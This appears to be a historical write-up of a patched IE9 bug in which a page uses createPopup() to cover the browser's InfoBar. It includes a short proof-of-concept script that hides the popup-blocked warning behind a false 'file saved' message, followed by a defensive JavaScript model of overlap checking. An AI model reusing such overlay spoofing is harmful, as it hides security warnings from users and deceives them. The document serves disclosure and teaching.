The IE9 InfoBar (the yellow notification bar at the top of the content area) could be overlaid by a createPopup() positioned to cover it exactly. This allowed an attacker page to hide security notifications — such as the popup-blocked message — replacing them with attacker-controlled content.
var mainWindow = window.open("", "mainWindow");          // reference to a named window used for the later open() call
var popUp = createPopup();                               // IE-only API: a chromeless popup the page can position freely
popUp.document.body.innerHTML = "Your file has been saved successfully.";  // attacker-controlled replacement text
popUp.show(0, 10, 400, 20, document.body);               // x, y, width, height chosen to match where the InfoBar renders
setTimeout("mainWindow.open()");                         // deferred open() is caught by the popup blocker, which raises the InfoBar
The setTimeout triggered the InfoBar (by opening a popup that would be blocked), and the createPopup was positioned to cover the exact pixel coordinates where the InfoBar appeared. From the user’s perspective, the legitimate security notification was invisible, replaced by a reassuring false message.
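The bug comes down to a layering rule: a surface whose position and content are chosen by the page must never be allowed to intersect trusted browser UI. The following is an added illustration, not code from the original post and not IE9's actual implementation; it models the InfoBar as a rectangle in window coordinates (the 0/10/400/20 geometry is taken from the exploit above, the InfoBar width is a constructed value) and contrasts an unchecked popup placement with one that refuses to let content-controlled surfaces overlap trusted chrome. The `auditPopupRequests` helper is a hypothetical review aid that flags requests overlapping any trusted region.

```javascript
// Added example (not from the original post): a minimal model of the
// InfoBar overlay problem. All geometry below is constructed for the
// illustration; only the popup request mirrors popUp.show(0, 10, 400, 20).

// Axis-aligned rectangle overlap test. Rectangles are {x, y, w, h} in window pixels.
function intersects(a, b) {
  return a.x < b.x + b.w && b.x < a.x + a.w &&
         a.y < b.y + b.h && b.y < a.y + a.h;
}

// Constructed geometry: trusted InfoBar at the top of the content area,
// 800px wide, 20px tall, starting 10px down (matching the exploit's y offset).
const INFOBAR = { x: 0, y: 10, w: 800, h: 20 };

// The request the attacker page makes: popUp.show(0, 10, 400, 20, ...)
const ATTACK_REQUEST = { x: 0, y: 10, w: 400, h: 20 };

// Vulnerable behaviour: the popup is placed exactly where the page asks,
// so it can sit on top of the trusted notification.
function showPopupUnchecked(req) {
  return { shown: true, rect: req, coversInfoBar: intersects(req, INFOBAR) };
}

// Hardened behaviour: a content-controlled surface may never overlap trusted
// chrome. This version clamps the request below the InfoBar; rejecting the
// request outright would be an equally valid policy.
function showPopupChecked(req, trusted = INFOBAR) {
  if (!intersects(req, trusted)) {
    return { shown: true, rect: req, coversInfoBar: false };
  }
  const firstFreeRow = trusted.y + trusted.h;
  const clamped = { x: req.x, y: Math.max(req.y, firstFreeRow), w: req.w, h: req.h };
  return {
    shown: true,
    rect: clamped,
    coversInfoBar: intersects(clamped, trusted),
    clamped: true,
  };
}

// Hypothetical review helper: given a list of popup placement requests,
// return the ones that would intersect any trusted region.
function auditPopupRequests(requests, trustedRegions = [INFOBAR]) {
  return requests.filter((r) => trustedRegions.some((t) => intersects(r, t)));
}

// Stand-alone demonstration.
console.log("unchecked covers InfoBar:", showPopupUnchecked(ATTACK_REQUEST).coversInfoBar);
console.log("checked placement:", showPopupChecked(ATTACK_REQUEST));
console.log("flagged requests:", auditPopupRequests([ATTACK_REQUEST, { x: 0, y: 100, w: 400, h: 20 }]));
```

The point of the model is that the check lives in the trusted layer: the page is still free to ask for any coordinates, but the browser, not the content, decides whether that rectangle may be drawn over a security notification.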
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.